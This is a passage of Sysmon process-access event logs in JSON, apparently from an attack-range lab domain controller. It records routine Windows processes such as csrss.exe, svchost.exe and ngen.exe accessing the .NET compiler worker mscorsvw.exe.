.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.137\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1327-5F25-0000-0010CC710B00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.137","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1327-5F25-0000-0010CC710B00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.153\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-00106AC70B00}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.153","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-00106AC70B00}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.184\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001024CB0B00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.184","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001024CB0B00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7636,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.184\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001024CB0B00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.184","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001024CB0B00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7637,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.200\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-001024CB0B00}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.200","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-001024CB0B00}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7638,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.231\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-0010BECE0B00}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.231","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-0010BECE0B00}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7639,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.231\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-0010BECE0B00}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.231","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-0010BECE0B00}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:07","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7640,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:07.246\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1333-5F25-0000-0010BECE0B00}\r\nTargetProcessId: 1360\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:07.246","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1333-5F25-0000-0010BECE0B00}","TargetProcessId":"1360","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
